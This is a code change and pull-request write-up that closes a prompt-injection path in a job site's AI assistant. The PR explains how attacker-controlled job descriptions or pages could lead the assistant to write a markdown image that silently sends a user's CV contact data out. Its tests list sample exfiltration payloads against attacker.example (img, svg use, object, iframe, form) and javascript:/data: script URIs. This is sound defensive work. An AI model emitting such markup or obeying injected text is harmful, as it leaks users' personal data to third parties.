-    const clean = DOMPurify.sanitize(html);
-    DOMPurify.removeHook('afterSanitizeAttributes');
-    return clean;
-  }
-
 
   // --- Streaming spinner / thinking timers ---------------------------------
   const SPINNER_GLYPHS = ['·', '✢', '✳', '✶', '✻', '✽'] as const;

--- a/web/src/lib/assistant/markdown.test.ts
+++ b/web/src/lib/assistant/markdown.test.ts
@@ -1,0 +1,98 @@
+import { describe, it, expect } from 'vitest';
+import { renderMarkdown } from './markdown';
+
+// Model output is untrusted: the assistant reads job descriptions, browsed pages and
+// other text an attacker controls end to end, so anything it writes may be an
+// attacker's words in the model's mouth. Nothing it emits may cause the browser to
+// issue a request — a rendered image is a GET the viewer never asked to make, and it
+// carries whatever the model was holding.
+describe('renderMarkdown — request-triggering markup', () => {
+  it('drops a markdown image', () => {
+    const html = renderMarkdown('![x](https://attacker.example/leak?d=secret)');
+    expect(html).not.toContain('<img');
+    expect(html).not.toContain('attacker.example');
+  });
+
+  it('drops a raw HTML image', () => {
+    const html = renderMarkdown('<img src="https://attacker.example/p.gif">');
+    expect(html).not.toContain('<img');
+    expect(html).not.toContain('attacker.example');
+  });
+
+  // The elements a forbidden-tags list tends to miss. Each one fetches.
+  it.each([
+    ['svg use', '<svg><use href="https://attacker.example/u"></use></svg>'],
+    ['object', '<object data="https://attacker.example/o"></object>'],
+    ['embed', '<embed src="https://attacker.example/e">'],
+    ['iframe', '<iframe src="https://attacker.example/i"></iframe>'],
+    ['video poster', '<video poster="https://attacker.example/v"></video>'],
+    ['picture source', '<picture><source srcset="https://attacker.example/s"></picture>'],
+    ['form', '<form action="https://attacker.example/f"><button>go</button></form>'],
+  ])('drops %s', (_name, input) => {
+    expect(renderMarkdown(input)).not.toContain('attacker.example');
+  });
+
+  // The channel is open on every re-render, not only the settled turn: the chat
+  // re-renders the answer on each streamed token, so an image would fire the moment
+  // its syntax closed — mid-answer, before anyone could read what was happening.
+  //
+  // The assertion is about markup that FETCHES, not about the host string: on a prefix
+  // where the image syntax has not closed yet, marked leaves it as literal text, and a
+  // URL sitting in a text node is inert.
+  it('emits no fetching markup from any prefix of a streamed answer', () => {
+    const answer = 'Here is what I found.\n\n![x](https://attacker.example/leak?d=secret)\n\nDone.';
+    for (let i = 1; i <= answer.length; i++) {
+      const html = renderMarkdown(answer.slice(0, i));
+      expect(html, `prefix of length ${i}`).not.toContain('<img');
+      expect(html, `prefix of length ${i}`).not.toContain('src=');
+    }
+  });
+});
+
+describe('renderMarkdown — URI schemes', () => {
+  it.each(['javascript:alert(1)', 'data:text/html,<script>alert(1)</script>'])(
+    'refuses the %s scheme',
+    (uri) => {
+      const html = renderMarkdown(`[click](${uri})`);
+      expect(html).not.toContain('href="' + uri);
+      expect(html).toContain('click');
+    },
+  );
+});
+
+// The policy has to leave the assistant able to write a readable answer — the prompt
+// asks it for short paragraphs, grouped findings and links.
+describe('renderMarkdown — prose survives', () => {
+  it('keeps headings, lists, emphasis, code and tables', () => {
+    const html = renderMarkdown(
+      '## Findings\n\n- **bold** and *italic* and ~~struck~~\n- `inline`\n\n```go\nfmt.Println()\n```\n\n| a | b |\n| --- | --- |\n| 1 | 2 |\n',
+    );
+    expect(html).toContain('<h2>Findings</h2>');
+    expect(html).toContain('<li>');
+    expect(html).toContain('<strong>bold</strong>');
+    expect(html).toContain('<em>italic</em>');
+    expect(html).toContain('<del>struck</del>');
+    expect(html).toContain('<code>inline</code>');
+    expect(html).toContain('<pre>');
+    expect(html).toContain('fmt.Println()');
+    expect(html).toContain('<table>');
+    expect(html).toContain('<td>1</td>');
+  });
+
+  it('opens a link in a new tab', () => {
+    const html = renderMarkdown('[freehire](https://freehire.me/jobs)');
+    expect(html).toContain('href="https://freehire.me/jobs"');
+    expect(html).toContain('target="_blank"');
+    expect(html).toContain('rel="noopener noreferrer"');
+  });
+
+  it('keeps a mailto link', () => {
+    expect(renderMarkdown('[mail](mailto:a@b.example)')).toContain('href="mailto:a@b.example"');
+  });
+
+  // Relative URLs are same-origin by definition, so they carry nothing off the site.
+  // Pinning schemes too tightly drops their href and leaves a dead link that looks fine.
+  it.each(['/my/profile', '#section', 'jobs/go-dev'])('keeps the relative link %s', (href) => {
+    expect(renderMarkdown(`[go](${href})`)).toContain(`href="${href}"`);
+  });
+});

--- a/web/src/lib/assistant/markdown.ts
+++ b/web/src/lib/assistant/markdown.ts
@@ -1,0 +1,68 @@
+// Rendering the assistant's answers to markup.
+//
+// freehire is a PUBLIC app and model output is untrusted, so marked's output is run
+// through DOMPurify before it reaches `{@html}`. `isomorphic-dompurify` is SSR-safe,
+// so the guard holds even though the chat paints client-side only — and it is what
+// lets this module be unit-tested under the node-environment vitest config.
+
+import { Marked } from 'marked';
+import DOMPurify from 'isomorphic-dompurify';
+
+const md = new Marked({ gfm: true, breaks: true });
+
+// An explicit prose allowlist, not a list of forbidden tags. A denylist over
+// DOMPurify's permissive default has to stay ahead of every element that can fetch,
+// and the ones already shipping are easy to miss — `<svg><use href>`, `<object>`,
+// `<embed>` and `<video poster>` all issue requests and none look like media at a
+// glance. This mirrors `newDescriptionPolicy()` in internal/sources/sanitize.go,
+// which made the same call for job description HTML: same class of untrusted input,
+// same reason. Notably absent: `img` and `input` (GFM task lists render a checkbox —
+// a form control, and losing it costs one glyph).
+const ALLOWED_TAGS = [
+  'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
+  'p', 'br', 'hr', 'blockquote', 'pre', 'code', 'div', 'span',
+  'ul', 'ol', 'li', 'dl', 'dt', 'dd',
+  'table', 'thead', 'tbody', 'tr', 'th', 'td',
+  'strong', 'em', 'b', 'i', 'u', 'del', 's',
+  'a',
+];
+
+// `target`/`rel` are here because the hook below writes them; `align` is what GFM
+// table alignment compiles to.
+const ALLOWED_ATTR = ['href', 'target', 'rel', 'align'];
+
+// Schemes, narrowed to match bluemonday's AllowStandardURLs() on the backend side:
+// http, https, mailto — and relative URLs, which are same-origin by definition and so
+// cannot carry anything off the site. The two trailing alternatives are what admit them
+// (a leading `/`, `#` or `.`, or a path segment not followed by a colon); without them a
+// link like `[profile](/my/profile)` silently loses its href. `javascript:` and `data:`
+// still fail, because each is a token that IS followed by a colon and is not listed.
+// The `-` sits last inside each character class so it is a literal, not a range.
+const ALLOWED_URI_REGEXP = /^(?:(?:https?|mailto):|[^a-z]|[a-z+.-]+(?:[^a-z+.:-]|$))/i;
+
+// Open links the model writes in a new tab so clicking one never navigates the chat
+// away. DOMPurify's hook registry is global, so the hook is added and removed around
+// each call rather than installed once — and removed in a `finally`, because a throw
+// inside `sanitize` would otherwise leave it applying to every other consumer.
+function openLinksInNewTab(node: Element) {
+  if (node.tagName === 'A') {
+    node.setAttribute('target', '_blank');
+    node.setAttribute('rel', 'noopener noreferrer');
+  }
+}
+
+/** Render one markdown string from the model to sanitized HTML for `{@html}`. */
+export function renderMarkdown(text: string): string {
+  const html = md.parse(text, { async: false }) as string;
+  DOMPurify.addHook('afterSanitizeAttributes', openLinksInNewTab);
+  try {
+    return DOMPurify.sanitize(html, {
+      ALLOWED_TAGS,
+      ALLOWED_ATTR,
+      ALLOWED_URI_REGEXP,
+      ALLOW_DATA_ATTR: false,
+    });
+  } finally {
+    DOMPurify.removeHook('afterSanitizeAttributes');
+  }
+}

--- a/web/svelte.config.js
+++ b/web/svelte.config.js
@@ -19,8 +19,7 @@ export default {
     // same-origin scripts run; SvelteKit auto-adds a per-response nonce (mode 'auto')
     // to the inline scripts IT injects (the hydration bootstrap). Inline JSON-LD
     // (<script type="application/ld+json">) is non-executable and unaffected.
-    // style-src/img-src are left unset (no default-src), so styles/fonts/logo.dev
-    // images are unrestricted.
+    // style-src is left unset (no default-src), so styles and fonts are unrestricted.
     //
     // The anti-FOUC theme script in app.html is author-written, so SvelteKit does NOT
     // nonce it — it is allowed by the SHA-256 of its exact contents below. WARNING:
@@ -42,6 +41,25 @@ export default {
         // forbid legacy plugin/embed vectors.
         'base-uri': ['self'],
         'object-src': ['none'],
+        // img-src is the layer under the assistant's markdown sanitizer. The chat
+        // renders model output with {@html}, and model output is untrusted — it reads
+        // job descriptions, browsed pages and other attacker-controlled text — so an
+        // image it can be talked into writing is a no-click GET carrying whatever the
+        // model held. The sanitizer (lib/assistant/markdown.ts) is the primary control;
+        // this pins where an image could go if that ever regresses.
+        //
+        // The list is exhaustive by inspection, not by habit: the only browser-side
+        // <img> sinks are CompanyLogo.svelte (the logo proxy) and TemplateGallery.svelte
+        // (same-origin /cv-previews/*.svg). OG cards render server-side and are never
+        // fetched under our own CSP, and job descriptions carry no images at all — the
+        // ingest sanitizer strips them (internal/sources/sanitize.go). `data:` is here
+        // for the handful of Tailwind utilities that inline an SVG.
+        'img-src': ['self', 'data:', 'https://logo.freehire.me'],
+        // Pinning img-src deliberately stopped there: connect-src was considered as
+        // part of the same hardening and left out, because getting it wrong fails
+        // silently — error reporting and analytics simply stop — and that deserves its
+        // own change with its own verification rather than riding along on this one.
+        //
         // Sentry: NO connect-src is set here on purpose. With no default-src, the
         // browser does not restrict fetch/beacon, so the Sentry SDK reaches its
         // ingest host (https://*.ingest.de.sentry.io — EU region) unblocked. The


### PR DESCRIPTION
Closes the prompt-injection → CV-exfiltration path in the in-app assistant. OpenSpec change: `assistant-untrusted-content-boundary`.

## The hole

The chat renders model output with `{@html}` after `DOMPurify.sanitize(html)` **called with no config**, so the permissive default allowlist applied and `<img>` survived. The CSP set `script-src`/`base-uri`/`object-src` but no `img-src` and no `default-src` — which by CSP's own rules leaves image loading unrestricted.

Model output is untrusted end to end: `search_jobs` returns full job descriptions, `cv_context` passes `job.Description` verbatim, `read_current_page` returns whatever page the extension stands on, and any signed-in user can push a page of their own into the live catalogue via `POST /jobs/resolve`. Together that made a **zero-click** egress channel, firing mid-stream on each re-render.

A characterisation test confirmed it empirically before the fix — `![x](https://attacker.example/leak?d=secret)` reached the DOM as a live `<img>`.

## The regression

What the channel could carry was a **regression against an existing requirement**, not a new gap. `openspec/specs/cv-tailoring/spec.md` already requires that the tailoring agent never receive the CV contact block, and `cv.go` implemented it — behind `auth.ViaAPIKey`, a test on the *transport*. That was written when the tailoring agent was an external process holding a scoped key. The in-process assistant holds no key and issues no HTTP request, so the branch never ran and `cv_get` returned the document whole: name, email, phone, personal links.

## The fix

- **Sanitizer** — an explicit prose allowlist, not `FORBID_TAGS`. A denylist over DOMPurify's default has to stay ahead of every element that can fetch, and `<svg><use href>`, `<object>`, `<embed>`, `<video poster>` all issue requests without looking like media. Mirrors `newDescriptionPolicy()` in `internal/sources/sanitize.go`, which made the same call for job descriptions and names the same tracking-pixel reason. `renderMarkdown` moves into its own module so the policy is testable at all.
- **CSP** — `img-src 'self' data: https://logo.freehire.me`, enumerated from the code: the only browser-side `<img>` sinks are `CompanyLogo.svelte` and same-origin `/cv-previews/*.svg`. `connect-src` deliberately **not** added — with no `default-src` its absence is what keeps Sentry ingest, GA collect and the PostHog proxy reachable, and getting it wrong fails silently.
- **Redaction** — moves to `cv.Store.GetForModel`, an accessor named for *who is reading* rather than how they arrived. Both readers route through it; the inline field-clearing in the handler is gone.
- **Prompt** — `tailorPrompt` claimed contacts were "out of reach". True for writes, false for reads. Now states what is enforced.

## Verification

| | |
|---|---|
| Go build / vet / test, `gofmt` | green |
| `TestPatchCVViaKey` (integration, Docker) | passes — HTTP behaviour unchanged |
| web tests | 447 (was 429) |
| web lint | 0 errors |
| CSP on a real build, 5 pages vs prod API | 0 violations |
| **CSP positive control** | browser blocked an image to an unlisted host |

The positive control matters more than the absence of violations: without it, "0 violations" and "CSP not enforced" are indistinguishable.

## Review caught two real defects in this diff

1. **Relative links lost their `href`.** The scheme regexp required an absolute scheme, diverging from the `AllowStandardURLs()` parity its own comment claimed. `[profile](/my/profile)` became a silently dead anchor. Relative URLs are same-origin by definition and cannot exfiltrate, so the restriction bought nothing. Fixed, with tests.
2. **`no-useless-escape` had a trap.** Dropping the backslash in `[^a-z+.\-:]` naively would turn `.-:` into a *range* covering digits and `/`. The hyphen moved to the end of each class instead, and equivalence was proven by running both forms over nine URLs.

## Not in scope (recorded as Non-Goals in the design)

`connect-src`/`default-src`; review or quarantine for `POST /jobs/resolve`; opening the rollout; hardening `read_current_page` (an injection *source* — the defence belongs at the sink).

## After deploy

Task 6.1 is open by decision: drive one assistant chat on prod with a beta account and confirm ordinary formatted answers render correctly. A live turn spends real inference and the assistant is gated to the beta group, so it belongs on the deployed stack. Rendering itself is covered pre-merge by 18 unit tests over real `marked` output, plus a check that the shipped bundle carries the allowlist.

Still gated by `requireRollout` (moderators + beta testers) throughout.